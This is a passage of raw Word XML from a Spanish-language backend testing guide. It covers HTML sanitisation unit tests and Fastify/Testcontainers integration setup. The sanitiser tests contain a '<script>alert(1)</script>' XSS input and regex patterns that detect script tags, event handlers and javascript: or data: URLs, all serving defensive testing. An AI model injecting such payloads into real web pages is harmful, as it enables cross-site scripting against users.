        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'h5'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'h6'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'blockquote'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'pre'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'code'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'span'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'div'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        ]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        allowedAttributes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'href'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'title'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          img</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'src'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'alt'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'width'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'height'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</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'style'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allowedSchemes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'http'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'https'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'mailto'</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not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toMatch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/&lt;script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\b[^&gt;]*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;/i</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not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toMatch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\w+\s*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=/i</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not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toMatch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/javascript:/i</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not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toMatch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/data:text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">html/i</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'preserva contenido legítimo después de sanitizar'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input </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'&lt;p&gt;Hola &lt;strong&gt;mundo&lt;/strong&gt;&lt;/p&gt;&lt;script&gt;alert(1)&lt;/script&gt;'</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sanitizeHtml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      allowedTags</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'strong'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      allowedAttributes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FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toBe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'&lt;p&gt;Hola &lt;strong&gt;mundo&lt;/strong&gt;&lt;/p&gt;'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'permite links https válidos'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input </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'&lt;a href="https://example.com"&gt;Link&lt;/a&gt;'</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sanitizeHtml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      allowedTags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'a'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      allowedAttributes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'href'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">] }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      allowedSchemes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'https'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FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toContain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'href="https://example.com"'</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03"/>
    <w:bookmarkEnd w:id="204"/>
    <w:bookmarkStart w:id="208" w:name="Xba7ca7f67881b653c417a5686e0619b67b035b5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12.2 Testing de Integración (Fastify.inject + Testcontainers)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Los tests de integración validan que los componentes del backend funcionen correctamente en conjunto, incluyendo acceso a bases de datos reales y endpoints HTTP.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">fastify.inject</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">es la herramienta nativa de Fastify que bypassa la capa HTTP/TCP, ofreciendo 2-5x más velocidad que supertest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[321]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="205" w:name="fastify.inject-para-api"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12.2.1 fastify.inject para API</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// packages/api/test/setup.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { beforeAll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> afterAll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 MongoDBContainer } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'@testcontainers/mongodb'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { RedisContainer } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'@testcontainers/redis'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { buildApp } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'../src/app'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">let</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mongoContainer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> MongoDBContainer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">let</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> redisContainer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> RedisContainer</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setupTestEnv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mongoContainer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FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">MongoDBContainer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'mongo:7.0.16'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</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NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  redisContainer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FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">RedisContainer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'redis:7.4-alpine'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>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MONGODB_URI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mongoContainer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">getConnectionString</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REDIS_URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> redisContainer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">getConnectionUrl</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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'test-secret-key-32-bytes-long!!'</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ENCRYPTION_KEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'a'</w:t>
      </w:r>
